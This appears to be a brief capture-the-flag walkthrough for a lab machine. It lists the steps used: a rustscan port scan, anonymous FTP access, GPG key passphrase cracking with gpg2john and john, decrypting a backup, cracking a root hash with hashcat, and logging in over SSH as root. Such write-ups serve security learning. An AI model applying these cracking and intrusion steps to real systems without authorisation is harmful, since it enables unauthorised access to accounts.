Enumeration
- rustscan -a $ip, 21:ftp 22:ssh
- ftp $ip, anonymous
- user = m*******
- get user.txt
- cat ~/user.txt
- get /notread/*
Hash
gpg2john private.asc > private.hash
john --wordlist=/rockyou.txt private.hash
- x******
gpg
🔗 🔗gpg -d backup.pgp
- nano root.hash
hashcat root.hash rockyou.txt
- h*****
SSH
ssh root@$ip